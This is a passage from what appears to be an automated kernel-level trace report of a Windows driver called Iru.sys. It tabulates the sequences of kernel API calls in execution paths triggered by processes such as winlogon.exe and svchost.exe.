| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #146 (length: 21, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 21 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d05ee38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b16dc, SpinLock_unk_out = 0xffffe0003a7b16dc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b16dc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b16dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b16dc, SpinLock_unk_out = 0xffffe0003a7b16dc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003e5f5550 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a788920, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b16dc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #154 (length: 30, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 30 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e452e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a765010, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #171 (length: 26, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 26 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c793e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Kernel Graph 10
Code Block #14 (EP #12)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2cf1f6 |
| Start Address | 0xfffff800416f78b0 |
Execution Path #12 (length: 1, count: 52, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 2 |
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 2 (System, PID: 4) | 46 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
Kernel Graph 11
Code Block #15 (EP #13)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c293e |
| Start Address | 0xfffff800416f6a00 |
Execution Path #13 (length: 1, count: 52, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 2 |
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 2 (System, PID: 4) | 46 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeReleaseSpinLock | SpinLock_unk = * (e.g. 0xffffe0003a763d44), NewIrql_unk = * (e.g. 0x2), SpinLock_unk_out = * (e.g. 0xffffe0003a763d44) |
Kernel Graph 12
Code Block #16 (EP #14, #16, #20, #22, #30, #29, #184, #76, #32, #86, #185, #186, #149)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2cb5a2 |
| Start Address | 0xfffff800416d3c80 |
Execution Path #14 (length: 20, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 20 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #16 (length: 76, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 76 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a769930 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80001064, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001064, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001064, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001064, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x48009 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a769aac, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c16ac10 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c831cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c16ac10, MemoryDescriptorList_unk_out = 0xffffe0003c16ac10 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c831cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c831cf0, Irp_unk_out = 0xffffe0003c831cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c16ac10 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7694b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000a88, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000a88, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000a88, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x48008 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
